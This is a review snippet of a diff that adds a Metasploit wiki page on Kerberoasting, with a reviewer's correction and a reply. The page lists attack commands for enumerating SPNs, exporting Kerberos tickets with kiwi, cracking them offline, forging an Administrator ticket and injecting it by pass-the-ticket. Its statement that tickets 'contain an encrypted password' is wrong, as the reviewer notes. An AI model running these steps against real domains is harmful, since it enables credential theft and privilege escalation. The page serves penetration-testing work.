docs/metasploit-framework.wiki/kerberoasting.md

```diff
@@ -0,0 +1,332 @@
+
+## Vulnerable Application
+
+Any system leveraging kerberos as a means of authentication e.g. Active Directory, MSSQL
+
+## Verification Steps
+
+1. Start msfconsole
+3. Obtain SPNs from your target
+	1. Do: `use auxiliary/gather/ldap_query`
+	2. Do: `set action ENUM_USER_SPNS_KERBEROAST`
+	3. Run the module and note the discovered SPNs
+4.  Request Service Tickets using the kiwi extension
+	1. Do: `load kiwi`
+	2. Do: `kerberos_ticket_list`
+5. Export service tickets using the kiwi extionsion
+	1. Do: `kiwi_cmd kerberos::list /export`
+6. Crack the encryped password in the service ticket using tgsrepcrack.py (more info on this python script below)
+	1. Do:  `python3 tgsrepcrack.py passlist.txt 1-40a10000-Administrator@HTTP\~testService-EXAMPLE.COM.kirbi`
+7. Rewrite the service tickets using kerberoast.py (more info on this python script below)
+	1. Do:  `python3  kerberoast.py -p N0tpassword!
+	    -r 1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi -w Administrator.kirbi -u 500`
+8. Finally inject the ticket back into RAM using meterpreter's kiwi extension
+	1. `meterpreter > kiwi_cmd kerberos::ptt Administrator.kirbi`
+
+## Kerberoasting
+
+Kerberoasting is a post-exploitation technique that tries to crack the password of a service acount withtin Active
+Directory. The attacker requests a ticket while pretending to be an account user with a service principal name (SPN),
+which contains an encrypted password. Once recieved, the attacker attemps to crack the password hash.
```

Comment:
> which contains an encrypted password

Portions of the service ticket are encrypted with a secret key - the service account's password. If a weak password has been used it's possible to use a brute force attack to identify the service account's password.

i.e. the ticket doesn't contain the encrypted password, the ticket is encrypted using the password

Reply:
Nothing actionable from these comments, just posting them for visibility - will tweak the docs in a different PR :+1: